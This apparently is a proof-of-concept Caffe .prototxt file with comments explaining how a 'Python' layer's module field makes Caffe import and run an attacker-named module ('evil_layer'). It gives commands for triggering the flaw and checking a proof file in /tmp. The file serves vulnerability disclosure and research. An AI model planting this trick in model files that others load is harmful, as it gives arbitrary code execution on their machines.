File size: 1,243 Bytes
f12fbe8 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | # PoC: Caffe PythonLayer Arbitrary Code Execution
# ================================================
# Loading this .prototxt with a Caffe build that has WITH_PYTHON_LAYER=1
# triggers arbitrary Python code execution via module import.
#
# Vulnerability: layer_factory.cpp:295
# bp::import(param.python_param().module().c_str())
#
# The "module" field specifies a Python module name that gets imported
# via boost::python. The import mechanism executes all top-level code
# in the module, giving the attacker arbitrary code execution.
#
# Usage:
# cd /path/to/this/directory # so Python finds evil_layer.py
# caffe test -model poc_rce.prototxt -iterations 1 2>/dev/null
# cat /tmp/caffe_rce_proof.txt # verify RCE
#
# Or from Python:
# import caffe
# net = caffe.Net('poc_rce.prototxt', caffe.TEST)
name: "PoCExploitNet"
layer {
name: "data"
type: "DummyData"
top: "data"
dummy_data_param {
shape { dim: 1 dim: 1 dim: 1 dim: 1 }
}
}
layer {
name: "exploit"
type: "Python"
bottom: "data"
top: "output"
python_param {
# This module name is passed directly to bp::import()
# Python's import mechanism executes top-level code in the module
module: "evil_layer"
layer: "ExploitLayer"
}
}
|